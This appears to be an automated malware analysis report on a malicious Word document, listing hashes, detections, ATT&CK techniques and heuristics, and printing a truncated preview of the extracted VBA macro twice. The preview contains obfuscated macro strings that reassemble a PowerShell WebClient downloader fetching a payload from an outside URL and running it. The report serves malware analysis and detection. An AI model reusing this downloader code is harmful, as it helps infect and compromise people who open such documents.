Office (OLE) malware analysis — malicious · 05f10b96cdc0c8b0

MALICIOUS

Office (OLE)

126.0 KB Created: 2017-12-07 10:10:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: c4d56a391540152aac1b0d9e901f18a0 SHA-1: 4ffa75cf6136ebd40e3dded52dc8ad1c82c20a1d SHA-256: 05f10b96cdc0c8b0f4a300d95c6cae61bbf8e54da858dbdfc3d8194e903d2ff0

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office Word document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' and the heuristic 'SE_PASSWORD_ARCHIVE_LURE' suggest the document is designed to trick the user into enabling macros or providing a password to decrypt a malicious payload, likely downloaded via the embedded URL.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41528 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	41528 bytes
SHA-256: `c24b8c5a972b707dd8b8f15e11b11c0959ed5a522c5af5b727974fc51a262813`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AwhuaNEjIfhpQd" Function wcMcBdiKhYPOj() qZPRznpz = Array(UCase("SvOIJLVbEMH" + "ihGDRDBdCsQXon" + "VqJXuSz" + "ZXCqoWmDBZGJnm" + "zqFtXafrTWJAku")) JtbvRbWVcsY = Mid("jRCWlD6br8m6+8m6eak;}catch8m6'+'+8m6{wrrAb'+'+rAb8m6+'+'8m6i8m6+8m6te8m6+8m6-host'+' rAb+rAbo48rAb+rAbm6'+'+8m6V_.Ex8m6+8m6c'+'e8m6+8m6wEnw9zO", 7, 129) fiDiBZY = Array(UCase("sqSaSBni" + "RcdJmHubpdDB" + "QziEsiWOqY" + "BpZMVlLAz" + "NHOhDrVszOtHW")) TsUfnKnY = Array(UCase("NfimjfOMMGQpO" + "iiNjvMhoYbTuji" + "iWCIMLaaAF" + "idsmHlQtl" + "wQpiHZGHTmzfr")) HaZCTf = Array(UCase("wnliKOaRkjaiPi" + "ozTDVCIzfz" + "EVYLXszS" + "pDEcvilt" + "MFthNZALzltq")) kGtkaJPuM = Mid("ErUE09b+rAb+8m6c.Downlo8m6+8m6adFile(o4Vab8m6+8rAb+rAbm6c8m6+8m6.TrAb+rAboSt8m6+8m6r8m6+8m6in8m6+8m6g(8m6+8m6)8m6+8m6, o48m6+8m6Vhua8m6+86JDvoa3Qc79Vk9NoMwi", 7, 131) jZzQGGoz = Array(UCase("kOjBlHDMdfdE" + "lUidmzciFNaFmU" + "hTQDmKCtE" + "IdojmJEDd" + "nkIMhOziAG")) iBrXPzi = Array(UCase("FhzKEtZLijwVf" + "vrHqRPNSrRWI" + "KMuMZTAzXclZsT" + "dYzMhnFUpub" + "bnpinwuPwoU")) hawDzj = Array(UCase("YmbrLzOuAX" + "YnlnvNlM" + "fUIOuVGC" + "AwUqjur" + "ncwITcwXlSz")) htvzrFqkW = Mid("cvi9PrIUUb2cpsr= n8m6+8m6e8m6+8m6w-8m6+8m6object 8m6+'+'rAb+rAb8mrAb+rAb6random;o4Vb8m6+8m6c8m6+8m6d = Ha6ht8m6+8m6t8m6+8m6p:8m6+8m6//s8m6+6lwN6Xm", 16, 124) FtRCkcb = Array(UCase("CioYOWQZwn" + "SUKaLFsERzsZK" + "tzdzEbpEaKDz" + "FSiCiowWNdVj" + "GjCZJEiq")) klVLqwHmoXP = Array(UCase("iwTSipEiM" + "ptLsAYrhDrwTaI" + "DLrJrJDIn" + "EfCMupMOqn" + "wacafDP")) MRniYNL = Array(UCase("GDiFlpzVszlJ" + "whBINXrlrYsL" + "TlhfiCVXhzmH" + "fzPYfFkWDnXwTJ" + "zOfquEVMoMPjoJ")) tjwHTzzh = Mid("vDPlBAT60DLdz4WwfH8QO+8m6g8m6+8m'+'6e;}}8'+'m6'+')-CREpLACE 8m61Un8m6'+','+'[chaR]92 -CrA'+'b'+'+rAbREprAb+rAbLACE([chaR]111+[chaR]52+[chaR]86)'+',[cha'+'R]36 -CR'+'EpLACE ([chrAb+rAbaR]72+[chaR]97+[chaR]54),[cTCI4pzwA2nfLLFThu", 22, 189) uYknAzYc = Array(UCase("SKVKFbd" + "VVmmkXVv" + "oVIBjEkVHGlOj" + "FoCVMiVz" + "RdrtDBVZFjhq")) lwWEwiFZ = Array(UCase("iPBQrsVSs" + "bJQzJjOsWaTU" + "MsKnbMQWvNnFHu" + "RGbvmET" + "FOicAqSjwOTpXh")) uHtzHXjA = Array(UCase("WNkBSmBNkjqOSi" + "CFzcCUzaPb" + "RKLJEHUiTwEmfp" + "OCJZnRqHaq" + "AddYnUaYUqB")) DLjGVAzMraW = Mid("I1ojm6+8m6=rAb+rAb new-8m6'+'+8m6obj8m6+8m6ecrAb+rAbt SysrAb+rAbt8m6+8m6em.Ne'+'t'+'.We8m6rAb+rAb+8m6bCli8m6+8m6enrAb+rAbt8rAb+rAbm6+8m6;8m6+8m6o4Vnsa8m6+8m6dasd 8m6+'+'8m6fOi4bQRi7EEfX", 5, 168) NfWmWJIa = Array(UCase("uGcPfwd" + "BpLaPwXhrtzEY" + "kPfdiqroFfkBjp" + "oowcWcmp" + "CkYjcvacj")) sSZmzYCHm = Array(UCase("bjtkPczSTmh" + "uQqncbC" + "TiHqEuIkLHVi" + "bipthafcX" + "NvXiWdnv")) KrdAzCZl = Array(UCase("ncuzsQFL" + "iHwFhHizpLu" + "znCtuLufazCBEw" + "iMkbrIKijDA" + "HhwGhlNpprG")) vtPpUNA = Mid("aK2lz2kO7jidkd03Vlha+8m6adasd.next(18m6+8m6,rAb+rA'+'b 38m6+8m6rAb+rAb43248m6+8m658m6+8mrAb+rAb6);o4Vhuas = o4Ve8m6+8m6nv:p8m6+8m6ublic +8m6rAb+rAb+8m6 Ha61U8m6+8m6nH'+'8m6'+'6kjJd", 21, 155) GcTIqjBG = Array(UCase("nPHzcCfVTNHLR" + "sSiAtvA" + "JwWtvhPmGY" + "crzUkNqC" + "LOQvvsf")) kIoOwmb = Array(UCase("EKfzlFwAidDnEk" + "pnITpuh" + "ziqUQrIomFnWj" + "KtdHzviiJCw" + "XCjYRCXXhUuk")) NWnduW = Array(UCase("OMQnQzHEPUGt" + "pVIhrfF" + "NvhqtjdADIK" + "DTAulAlbEWtH" + "BWciloW")) ulhUPCiBvVb = Mid("GYY7wwbNaq080mJnhaR]39) f5B &((GeT-VaRIAbLe rAb+rAb8m6MDR8m6).Name[3,11,2]'+'-JoIn8m68m6)rAb).rEpLA'+'Ce((['+'c'+'har]5'+'6+[char]10F2", 17, 118) LWcjESt = Array(UCase("JZoQhRNVMcP" + "iulJTVoYiTGIO" + "kzJvpzsbqVpNb" + "iMLZQiiIlOOz" + "MwqSjCs")) bUzhQu = Array(UCase("FBRjwXRdEMLw" + "BVVNvrud" + "qBZlrJARRT" + "wwSjLodUwzJiL" + "ABHUpzcIhKPJLf")) CaozcPJwuOs = Array(UCase("walvSAdQOL" + "RdLKtKXi" + "nKKIiWGIJMkYwT" + "FLCDRFSm" + "wLSjKupNJ")) actXbEDhpA = Mid("hb0GaCf8rAb+rAbm658m6+8m6,htt8m6+8mrAb+rAb6p8m6+8m6:rAb+rAb8m6+8m6/'+'8m6+8m6/chimach8m6+8m6i8m6 ... (truncated)

SHA-256: c24b8c5a972b707dd8b8f15e11b11c0959ed5a522c5af5b727974fc51a262813

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AwhuaNEjIfhpQd"
Function wcMcBdiKhYPOj()
qZPRznpz = Array(UCase("SvOIJLVbEMH" + "ihGDRDBdCsQXon" + "VqJXuSz" + "ZXCqoWmDBZGJnm" + "zqFtXafrTWJAku"))
JtbvRbWVcsY = Mid("jRCWlD6br8m6+8m6eak;}catch8m6'+'+8m6{wrrAb'+'+rAb8m6+'+'8m6i8m6+8m6te8m6+8m6-host'+' rAb+rAbo48rAb+rAbm6'+'+8m6V_.Ex8m6+8m6c'+'e8m6+8m6wEnw9zO", 7, 129)
fiDiBZY = Array(UCase("sqSaSBni" + "RcdJmHubpdDB" + "QziEsiWOqY" + "BpZMVlLAz" + "NHOhDrVszOtHW"))
TsUfnKnY = Array(UCase("NfimjfOMMGQpO" + "iiNjvMhoYbTuji" + "iWCIMLaaAF" + "idsmHlQtl" + "wQpiHZGHTmzfr"))
HaZCTf = Array(UCase("wnliKOaRkjaiPi" + "ozTDVCIzfz" + "EVYLXszS" + "pDEcvilt" + "MFthNZALzltq"))
kGtkaJPuM = Mid("ErUE09b+rAb+8m6c.Downlo8m6+8m6adFile(o4Vab8m6+8rAb+rAbm6c8m6+8m6.TrAb+rAboSt8m6+8m6r8m6+8m6in8m6+8m6g(8m6+8m6)8m6+8m6, o48m6+8m6Vhua8m6+86JDvoa3Qc79Vk9NoMwi", 7, 131)
jZzQGGoz = Array(UCase("kOjBlHDMdfdE" + "lUidmzciFNaFmU" + "hTQDmKCtE" + "IdojmJEDd" + "nkIMhOziAG"))
iBrXPzi = Array(UCase("FhzKEtZLijwVf" + "vrHqRPNSrRWI" + "KMuMZTAzXclZsT" + "dYzMhnFUpub" + "bnpinwuPwoU"))
hawDzj = Array(UCase("YmbrLzOuAX" + "YnlnvNlM" + "fUIOuVGC" + "AwUqjur" + "ncwITcwXlSz"))
htvzrFqkW = Mid("cvi9PrIUUb2cpsr= n8m6+8m6e8m6+8m6w-8m6+8m6object 8m6+'+'rAb+rAb8mrAb+rAb6random;o4Vb8m6+8m6c8m6+8m6d = Ha6ht8m6+8m6t8m6+8m6p:8m6+8m6//s8m6+6lwN6Xm", 16, 124)
FtRCkcb = Array(UCase("CioYOWQZwn" + "SUKaLFsERzsZK" + "tzdzEbpEaKDz" + "FSiCiowWNdVj" + "GjCZJEiq"))
klVLqwHmoXP = Array(UCase("iwTSipEiM" + "ptLsAYrhDrwTaI" + "DLrJrJDIn" + "EfCMupMOqn" + "wacafDP"))
MRniYNL = Array(UCase("GDiFlpzVszlJ" + "whBINXrlrYsL" + "TlhfiCVXhzmH" + "fzPYfFkWDnXwTJ" + "zOfquEVMoMPjoJ"))
tjwHTzzh = Mid("vDPlBAT60DLdz4WwfH8QO+8m6g8m6+8m'+'6e;}}8'+'m6'+')-CREpLACE 8m61Un8m6'+','+'[chaR]92 -CrA'+'b'+'+rAbREprAb+rAbLACE([chaR]111+[chaR]52+[chaR]86)'+',[cha'+'R]36 -CR'+'EpLACE ([chrAb+rAbaR]72+[chaR]97+[chaR]54),[cTCI4pzwA2nfLLFThu", 22, 189)
uYknAzYc = Array(UCase("SKVKFbd" + "VVmmkXVv" + "oVIBjEkVHGlOj" + "FoCVMiVz" + "RdrtDBVZFjhq"))
lwWEwiFZ = Array(UCase("iPBQrsVSs" + "bJQzJjOsWaTU" + "MsKnbMQWvNnFHu" + "RGbvmET" + "FOicAqSjwOTpXh"))
uHtzHXjA = Array(UCase("WNkBSmBNkjqOSi" + "CFzcCUzaPb" + "RKLJEHUiTwEmfp" + "OCJZnRqHaq" + "AddYnUaYUqB"))
DLjGVAzMraW = Mid("I1ojm6+8m6=rAb+rAb new-8m6'+'+8m6obj8m6+8m6ecrAb+rAbt SysrAb+rAbt8m6+8m6em.Ne'+'t'+'.We8m6rAb+rAb+8m6bCli8m6+8m6enrAb+rAbt8rAb+rAbm6+8m6;8m6+8m6o4Vnsa8m6+8m6dasd 8m6+'+'8m6fOi4bQRi7EEfX", 5, 168)
NfWmWJIa = Array(UCase("uGcPfwd" + "BpLaPwXhrtzEY" + "kPfdiqroFfkBjp" + "oowcWcmp" + "CkYjcvacj"))
sSZmzYCHm = Array(UCase("bjtkPczSTmh" + "uQqncbC" + "TiHqEuIkLHVi" + "bipthafcX" + "NvXiWdnv"))
KrdAzCZl = Array(UCase("ncuzsQFL" + "iHwFhHizpLu" + "znCtuLufazCBEw" + "iMkbrIKijDA" + "HhwGhlNpprG"))
vtPpUNA = Mid("aK2lz2kO7jidkd03Vlha+8m6adasd.next(18m6+8m6,rAb+rA'+'b 38m6+8m6rAb+rAb43248m6+8m658m6+8mrAb+rAb6);o4Vhuas = o4Ve8m6+8m6nv:p8m6+8m6ublic +8m6rAb+rAb+8m6 Ha61U8m6+8m6nH'+'8m6'+'6kjJd", 21, 155)
GcTIqjBG = Array(UCase("nPHzcCfVTNHLR" + "sSiAtvA" + "JwWtvhPmGY" + "crzUkNqC" + "LOQvvsf"))
kIoOwmb = Array(UCase("EKfzlFwAidDnEk" + "pnITpuh" + "ziqUQrIomFnWj" + "KtdHzviiJCw" + "XCjYRCXXhUuk"))
NWnduW = Array(UCase("OMQnQzHEPUGt" + "pVIhrfF" + "NvhqtjdADIK" + "DTAulAlbEWtH" + "BWciloW"))
ulhUPCiBvVb = Mid("GYY7wwbNaq080mJnhaR]39) f5B &((GeT-VaRIAbLe rAb+rAb8m6*MDR*8m6).Name[3,11,2]'+'-JoIn8m68m6)rAb).rEpLA'+'Ce((['+'c'+'har]5'+'6+[char]10F2", 17, 118)
LWcjESt = Array(UCase("JZoQhRNVMcP" + "iulJTVoYiTGIO" + "kzJvpzsbqVpNb" + "iMLZQiiIlOOz" + "MwqSjCs"))
bUzhQu = Array(UCase("FBRjwXRdEMLw" + "BVVNvrud" + "qBZlrJARRT" + "wwSjLodUwzJiL" + "ABHUpzcIhKPJLf"))
CaozcPJwuOs = Array(UCase("walvSAdQOL" + "RdLKtKXi" + "nKKIiWGIJMkYwT" + "FLCDRFSm" + "wLSjKupNJ"))
actXbEDhpA = Mid("hb0GaCf8rAb+rAbm658m6+8m6,htt8m6+8mrAb+rAb6p8m6+8m6:rAb+rAb8m6+8m6/'+'8m6+8m6/chimach8m6+8m6i8m6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.